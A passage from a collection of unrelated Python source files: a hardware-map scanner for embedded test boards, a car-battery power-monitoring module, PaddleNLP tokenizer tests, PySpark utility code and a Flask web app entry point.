'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
runner_params = dut.get('runner_params')
serial_pty = dut.get('serial_pty')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
connected= dut.get('connected') and ((serial or serial_pty) is not None)
new_dut = DUT(platform=platform,
product=product,
runner=runner,
runner_params=runner_params,
id=id,
serial_pty=serial_pty,
serial=serial,
serial_baud=baud,
connected=connected,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x.get('serial', ''))
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from typing import Optional
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
from selfdrive.statsd import statlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600
MIN_ON_TIME_S = 3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of peripheralState voltage
self.car_voltage_instant_mV = 12e3 # Last value of peripheralState voltage
self.integration_lock = threading.Lock()
self.ts_last_charging_ctrl = None
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, peripheralState, ignition):
try:
now = sec_since_boot()
# If peripheralState is None, we're probably not in a car, so we don't care
if peripheralState is None or peripheralState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = peripheralState.voltage
self.car_voltage_mV = ((peripheralState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
statlog.gauge("car_voltage", self.car_voltage_mV / 1e3)
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if ignition:
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t: float, current_power: float) -> None:
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self) -> int:
return int(self.power_used_uWh)
def get_car_battery_capacity(self) -> int:
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, ignition: bool, in_car: bool, offroad_timestamp: Optional[float]) -> bool:
if offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= not ignition
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= in_car
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, peripheralState, ignition, in_car, offroad_timestamp, started_seen):
if offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client)
BATT_PERC_OFF = self.batt_perc_off_auto_power()
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(ignition, in_car, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 30))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
def charging_ctrl(self, msg, ts, to_discharge, to_charge ):
if self.ts_last_charging_ctrl is None or (ts - self.ts_last_charging_ctrl) >= 300.:
battery_changing = HARDWARE.get_battery_charging()
if self.ts_last_charging_ctrl:
if msg.deviceState.batteryPercent >= to_discharge and battery_changing:
HARDWARE.set_battery_charging(False)
elif msg.deviceState.batteryPercent <= to_charge and not battery_changing:
HARDWARE.set_battery_charging(True)
self.ts_last_charging_ctrl = ts
def batt_perc_off_auto_power(self):
batt_perc_off = 40
if self.params.get_bool("OpkrPowerShutdown"):
batt_perc_off = 70
return batt_perc_off
|
test_tokenizer.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import os
from typing import Type, List, Tuple
import shutil
import unittest
from multiprocessing import Process
from tempfile import TemporaryDirectory
from parameterized import parameterized
from paddle import nn
from paddlenlp.transformers.model_utils import PretrainedModel, MODEL_HOME
from paddlenlp.transformers.tokenizer_utils import PretrainedTokenizer
from paddlenlp.transformers import BertTokenizer, BasicTokenizer, WordpieceTokenizer
from paddlenlp.transformers.bert.modeling import BertForPretraining
from paddlenlp.transformers.gpt.modeling import GPTForPretraining
from paddlenlp.transformers.tinybert.modeling import TinyBertForPretraining
from paddlenlp.transformers.bert.tokenizer import BertTokenizer
from paddlenlp.transformers.gpt.tokenizer import GPTTokenizer, GPTChineseTokenizer
from paddlenlp.transformers.tinybert.tokenizer import TinyBertTokenizer
from tests.common_test import CpuCommonTest, CommonTest
from tests.util import slow, assert_raises
class FakePretrainedModel(PretrainedModel):
def __init__(self):
super().__init__()
self.linear = nn.Linear(2, 2)
def forward(self, *args, **kwargs):
pass
def get_pretrained_models_params() -> List[Tuple[str, Type[PretrainedModel]]]:
"""get all of pretrained model names in some PretrainedModels
Returns:
List[Tuple[str, Type[PretrainedModel]]]: the parameters of unit test method
"""
model_types: List[PretrainedModel] = [
BertForPretraining, GPTForPretraining, TinyBertForPretraining
]
name_class_tuples: List[Tuple[str, Type[PretrainedModel]]] = []
for ModelType in model_types:
for model_name in ModelType.pretrained_resource_files_map.get(
'model_state', {}).keys():
name_class_tuples.append([model_name, ModelType])
return name_class_tuples
def get_pretrained_tokenzier_params(
) -> List[Tuple[str, Type[PretrainedTokenizer]]]:
"""get all of pretrained tokenzier names in some PretrainedTokenzier
Returns:
List[Tuple[str, Type[PretrainedTokenzier]]]: the parameters of unit test method
"""
tokenizer_types: List[PretrainedTokenizer] = [
BertTokenizer, GPTTokenizer, GPTChineseTokenizer, TinyBertTokenizer
]
name_class_params: List[Tuple[str, Type[PretrainedTokenizer]]] = []
for TokenizerType in tokenizer_types:
for model_name in TokenizerType.pretrained_resource_files_map.get(
'vocab_file', {}).keys():
name_class_params.append([model_name, TokenizerType])
return name_class_params
class TestPretrainedFromPretrained(CpuCommonTest):
"""module for test pretrained model"""
def setUp(self):
self.temp_dir = TemporaryDirectory()
model = FakePretrainedModel()
model.save_pretrained(self.temp_dir.name)
def do_pretrained_in_process(self):
FakePretrainedModel.from_pretrained(self.temp_dir.name)
@parameterized.expand([(1, ), (8, ), (20, ), (50, ), (100, ), (1000, )])
def test_model_config_writing(self, process_num: int):
for _ in range(process_num):
process = Process(target=self.do_pretrained_in_process)
process.start()
@parameterized.expand(get_pretrained_models_params())
def test_pretrained_model(self, model_name: str,
PretrainedModelClass: Type[PretrainedModel]):
"""stupid test"""
cache_dir = os.path.join(MODEL_HOME, model_name)
shutil.rmtree(cache_dir, ignore_errors=True)
model: PretrainedModelClass = PretrainedModelClass.from_pretrained(
model_name)
self.assertTrue(
os.path.exists(os.path.join(cache_dir, model.model_config_file)))
# TODO(wj-Mcat): make this test code pass
# from pretrained from the dir
# PretrainedModelClass.from_pretrained(cache_dir)
# remove the cache model file
shutil.rmtree(cache_dir, ignore_errors=True)
@parameterized.expand(get_pretrained_tokenzier_params())
def test_pretrained_tokenizer(
self, tokenizer_name: str,
PretrainedTokenzierClass: Type[PretrainedTokenizer]):
"""stupid test on the pretrained tokenzier"""
cache_dir = os.path.join(MODEL_HOME, tokenizer_name)
shutil.rmtree(cache_dir, ignore_errors=True)
tokenizer: PretrainedTokenzierClass = PretrainedTokenzierClass.from_pretrained(
tokenizer_name)
files = os.listdir(cache_dir)
self.assertTrue(
os.path.exists(
os.path.join(cache_dir, tokenizer.tokenizer_config_file)))
for resource_file_name in tokenizer.resource_files_names.values():
self.assertTrue(
os.path.exists(os.path.join(cache_dir, resource_file_name)))
# TODO(wj-Mcat): make this test code pass
# from_pretrained from the dir
# PretrainedTokenzierClass.from_pretrained(cache_dir)
# remove the cache model file
shutil.rmtree(cache_dir, ignore_errors=True)
|
util.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import itertools
import os
import platform
import re
import sys
import threading
import traceback
from types import TracebackType
from typing import Any, Callable, Iterator, List, Optional, TextIO, Tuple
from py4j.clientserver import ClientServer # type: ignore[import]
__all__: List[str] = []
from py4j.java_gateway import JavaObject
def print_exec(stream: TextIO) -> None:
ei = sys.exc_info()
traceback.print_exception(ei[0], ei[1], ei[2], None, stream)
class VersionUtils:
"""
Provides utility method to determine Spark versions with given input string.
"""
@staticmethod
def majorMinorVersion(sparkVersion: str) -> Tuple[int, int]:
"""
Given a Spark version string, return the (major version number, minor version number).
E.g., for 2.0.1-SNAPSHOT, return (2, 0).
Examples
--------
>>> sparkVersion = "2.4.0"
>>> VersionUtils.majorMinorVersion(sparkVersion)
(2, 4)
>>> sparkVersion = "2.3.0-SNAPSHOT"
>>> VersionUtils.majorMinorVersion(sparkVersion)
(2, 3)
"""
m = re.search(r"^(\d+)\.(\d+)(\..*)?$", sparkVersion)
if m is not None:
return (int(m.group(1)), int(m.group(2)))
else:
raise ValueError(
"Spark tried to parse '%s' as a Spark" % sparkVersion
+ " version string, but it could not find the major and minor"
+ " version numbers."
)
def fail_on_stopiteration(f: Callable) -> Callable:
"""
Wraps the input function to fail on 'StopIteration' by raising a 'RuntimeError'
prevents silent loss of data when 'f' is used in a for loop in Spark code
"""
def wrapper(*args: Any, **kwargs: Any) -> Any:
try:
return f(*args, **kwargs)
except StopIteration as exc:
raise RuntimeError(
"Caught StopIteration thrown from user's code; failing the task", exc
)
return wrapper
def walk_tb(tb: Optional[TracebackType]) -> Iterator[TracebackType]:
while tb is not None:
yield tb
tb = tb.tb_next
def try_simplify_traceback(tb: TracebackType) -> Optional[TracebackType]:
"""
Simplify the traceback. It removes the tracebacks in the current package, and only
shows the traceback that is related to the thirdparty and user-specified codes.
Returns
-------
TracebackType or None
Simplified traceback instance. It returns None if it fails to simplify.
Notes
-----
This keeps the tracebacks once it sees they are from a different file even
though the following tracebacks are from the current package.
Examples
--------
>>> import importlib
>>> import sys
>>> import traceback
>>> import tempfile
>>> with tempfile.TemporaryDirectory() as tmp_dir:
... with open("%s/dummy_module.py" % tmp_dir, "w") as f:
... _ = f.write(
... 'def raise_stop_iteration():\\n'
... ' raise StopIteration()\\n\\n'
... 'def simple_wrapper(f):\\n'
... ' def wrapper(*a, **k):\\n'
... ' return f(*a, **k)\\n'
... ' return wrapper\\n')
... f.flush()
... spec = importlib.util.spec_from_file_location(
... "dummy_module", "%s/dummy_module.py" % tmp_dir)
... dummy_module = importlib.util.module_from_spec(spec)
... spec.loader.exec_module(dummy_module)
>>> def skip_doctest_traceback(tb):
... import pyspark
... root = os.path.dirname(pyspark.__file__)
... pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
... for cur_tb, cur_frame in pairs:
... if cur_frame.filename.startswith(root):
... return cur_tb
Regular exceptions should show the file name of the current package as below.
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.raise_stop_iteration)()
... except Exception as e:
... tb = sys.exc_info()[-1]
... e.__cause__ = None
... exc_info = "".join(
... traceback.format_exception(type(e), e, tb))
>>> print(exc_info) # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
Traceback (most recent call last):
File ...
...
File "/.../pyspark/util.py", line ...
...
RuntimeError: ...
>>> "pyspark/util.py" in exc_info
True
If the traceback is simplified with this method, it hides the current package file name:
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.raise_stop_iteration)()
... except Exception as e:
... tb = try_simplify_traceback(sys.exc_info()[-1])
... e.__cause__ = None
... exc_info = "".join(
... traceback.format_exception(
... type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
>>> print(exc_info) # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
RuntimeError: ...
>>> "pyspark/util.py" in exc_info
False
In the case below, the traceback contains the current package in the middle.
In this case, it just hides the top occurrence only.
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.simple_wrapper(
... fail_on_stopiteration(dummy_module.raise_stop_iteration)))()
... except Exception as e:
... tb = sys.exc_info()[-1]
... e.__cause__ = None
... exc_info_a = "".join(
... traceback.format_exception(type(e), e, tb))
... exc_info_b = "".join(
... traceback.format_exception(
... type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
>>> exc_info_a.count("pyspark/util.py")
2
>>> exc_info_b.count("pyspark/util.py")
1
"""
if "pypy" in platform.python_implementation().lower():
# Traceback modification is not supported with PyPy in PySpark.
return None
if sys.version_info[:2] < (3, 7):
# Traceback creation is not supported Python < 3.7.
# See https://bugs.python.org/issue30579.
return None
import pyspark
root = os.path.dirname(pyspark.__file__)
tb_next = None
new_tb = None
pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
last_seen = []
for cur_tb, cur_frame in pairs:
if not cur_frame.filename.startswith(root):
# Filter the stacktrace from the PySpark source itself.
last_seen = [(cur_tb, cur_frame)]
break
for cur_tb, cur_frame in reversed(list(itertools.chain(last_seen, pairs))):
# Once we have seen the file names outside, don't skip.
new_tb = TracebackType(
tb_next=tb_next,
tb_frame=cur_tb.tb_frame,
tb_lasti=cur_tb.tb_frame.f_lasti,
tb_lineno=cur_tb.tb_frame.f_lineno if cur_tb.tb_frame.f_lineno is not None else -1,
)
tb_next = new_tb
return new_tb
def _print_missing_jar(lib_name: str, pkg_name: str, jar_name: str, spark_version: str) -> None:
print(
"""
________________________________________________________________________________________________
Spark %(lib_name)s libraries not found in class path. Try one of the following.
1. Include the %(lib_name)s library and its dependencies with in the
spark-submit command as
$ bin/spark-submit --packages org.apache.spark:spark-%(pkg_name)s:%(spark_version)s ...
2. Download the JAR of the artifact from Maven Central http://search.maven.org/,
Group Id = org.apache.spark, Artifact Id = spark-%(jar_name)s, Version = %(spark_version)s.
Then, include the jar in the spark-submit command as
$ bin/spark-submit --jars <spark-%(jar_name)s.jar> ...
________________________________________________________________________________________________
"""
% {
"lib_name": lib_name,
"pkg_name": pkg_name,
"jar_name": jar_name,
"spark_version": spark_version,
}
)
def _parse_memory(s: str) -> int:
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MiB
Examples
--------
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {"g": 1024, "m": 1, "t": 1 << 20, "k": 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def inheritable_thread_target(f: Callable) -> Callable:
"""
Return thread target wrapper which is recommended to be used in PySpark when the
pinned thread mode is enabled. The wrapper function, before calling original
thread target, it inherits the inheritable properties specific
to JVM thread such as ``InheritableThreadLocal``.
Also, note that pinned thread mode does not close the connection from Python
to JVM when the thread is finished in the Python side. With this wrapper, Python
garbage-collects the Python thread instance and also closes the connection
which finishes JVM thread correctly.
When the pinned thread mode is off, it return the original ``f``.
.. versionadded:: 3.2.0
Parameters
----------
f : function
the original thread target.
Notes
-----
This API is experimental.
It is important to know that it captures the local properties when you decorate it
whereas :class:`InheritableThread` captures when the thread is started.
Therefore, it is encouraged to decorate it when you want to capture the local
properties.
For example, the local properties from the current Spark context is captured
when you define a function here instead of the invocation:
>>> @inheritable_thread_target
... def target_func():
... pass # your codes.
If you have any updates on local properties afterwards, it would not be reflected to
the Spark context in ``target_func()``.
The example below mimics the behavior of JVM threads as close as possible:
>>> Thread(target=inheritable_thread_target(target_func)).start() # doctest: +SKIP
"""
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer): # type: ignore[attr-defined]
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
# NOTICE the internal difference vs `InheritableThread`. `InheritableThread`
# copies local properties when the thread starts but `inheritable_thread_target`
# copies when the function is wrapped.
assert SparkContext._active_spark_context is not None
properties = SparkContext._active_spark_context._jsc.sc().getLocalProperties().clone()
@functools.wraps(f)
def wrapped(*args: Any, **kwargs: Any) -> Any:
try:
# Set local properties in child thread.
assert SparkContext._active_spark_context is not None
SparkContext._active_spark_context._jsc.sc().setLocalProperties( # type: ignore[attr-defined]
properties
)
return f(*args, **kwargs)
finally:
InheritableThread._clean_py4j_conn_for_current_thread()
return wrapped
else:
return f
class InheritableThread(threading.Thread):
"""
Thread that is recommended to be used in PySpark instead of :class:`threading.Thread`
when the pinned thread mode is enabled. The usage of this class is exactly same as
:class:`threading.Thread` but correctly inherits the inheritable properties specific
to JVM thread such as ``InheritableThreadLocal``.
Also, note that pinned thread mode does not close the connection from Python
to JVM when the thread is finished in the Python side. With this class, Python
garbage-collects the Python thread instance and also closes the connection
which finishes JVM thread correctly.
When the pinned thread mode is off, this works as :class:`threading.Thread`.
.. versionadded:: 3.1.0
Notes
-----
This API is experimental.
"""
_props: JavaObject
def __init__(self, target: Callable, *args: Any, **kwargs: Any):
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer): # type: ignore[attr-defined]
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
def copy_local_properties(*a: Any, **k: Any) -> Any:
# self._props is set before starting the thread to match the behavior with JVM.
assert hasattr(self, "_props")
assert SparkContext._active_spark_context is not None
SparkContext._active_spark_context._jsc.sc().setLocalProperties( # type: ignore[attr-defined]
self._props
)
try:
return target(*a, **k)
finally:
InheritableThread._clean_py4j_conn_for_current_thread()
super(InheritableThread, self).__init__(
target=copy_local_properties, *args, **kwargs # type: ignore[misc]
)
else:
super(InheritableThread, self).__init__(
target=target, *args, **kwargs # type: ignore[misc]
)
def start(self) -> None:
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer): # type: ignore[attr-defined]
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
# Local property copy should happen in Thread.start to mimic JVM's behavior.
assert SparkContext._active_spark_context is not None
self._props = SparkContext._active_spark_context._jsc.sc().getLocalProperties().clone()
return super(InheritableThread, self).start()
@staticmethod
def _clean_py4j_conn_for_current_thread() -> None:
from pyspark import SparkContext
jvm = SparkContext._jvm
assert jvm is not None
thread_connection = jvm._gateway_client.get_thread_connection()
if thread_connection is not None:
try:
# Dequeue is shared across other threads but it's thread-safe.
# If this function has to be invoked one more time in the same thead
# Py4J will create a new connection automatically.
jvm._gateway_client.deque.remove(thread_connection)
except ValueError:
# Should never reach this point
return
finally:
thread_connection.close()
if __name__ == "__main__":
if "pypy" not in platform.python_implementation().lower() and sys.version_info[:2] >= (3, 7):
import doctest
import pyspark.util
from pyspark.context import SparkContext
globs = pyspark.util.__dict__.copy()
globs["sc"] = SparkContext("local[4]", "PythonTest")
(failure_count, test_count) = doctest.testmod(pyspark.util, globs=globs)
globs["sc"].stop()
if failure_count:
sys.exit(-1)
|
main.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main entry module specified in app.yaml.
This module contains the request handler codes and the main app.
"""
import logging
import os
import requests
import sys
import threading
import time
import flask
from flask import request
import services.datacommons as dc
from __init__ import create_app
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(lineno)d : %(message)s')
app = create_app()
app.jinja_env.globals['GA_ACCOUNT'] = app.config['GA_ACCOUNT']
app.jinja_env.globals['NAME'] = app.config['NAME']
app.jinja_env.globals['BASE_HTML'] = app.config['BASE_HTML_PATH']
WARM_UP_ENDPOINTS = [
"/api/choropleth/geojson?placeDcid=country/USA&placeType=County",
"/api/place/parent/country/USA",
"/api/place/places-in-names?dcid=country/USA&placeType=County",
"/api/stats/set/series/within-place?parent_place=country/USA&child_type=County&stat_vars=Count_Person",
]
def send_warmup_requests():
logging.info("Sending warm up requests:")
for endpoint in WARM_UP_ENDPOINTS:
while True:
try:
resp = requests.get("http://127.0.0.1:8080" + endpoint)
if resp.status_code == 200:
break
except:
pass
time.sleep(1)
@app.before_request
def before_request():
scheme = request.headers.get('X-Forwarded-Proto')
if scheme and scheme == 'http' and request.url.startswith('http://'):
url = request.url.replace('http://', 'https://', 1)
code = 301
return flask.redirect(url, code=code)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/translator')
def translator_handler():
return flask.render_template('translator.html')
@app.route('/healthz')
def healthz():
return "very healthy"
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/mcf_playground')
def mcf_playground():
return flask.render_template('mcf_playground.html')
# TODO(shifucun): get branch cache version from mixer
@app.route('/version')
def version():
mixer_version = dc.version()
return flask.render_template('version.html',
website_hash=os.environ.get("WEBSITE_HASH"),
mixer_hash=mixer_version['gitHash'],
tables=mixer_version['tables'],
bigquery=mixer_version['bigQuery'])
if not (app.config["TEST"] or app.config["WEBDRIVER"] or app.config["LOCAL"]):
thread = threading.Thread(target=send_warmup_requests)
thread.start()
if __name__ == '__main__':
# This is used when running locally only. When deploying to GKE,
# a webserver process such as Gunicorn will serve the app.
logging.info("Run web server in local mode")
port = sys.argv[1] if len(sys.argv) >= 2 else 8080
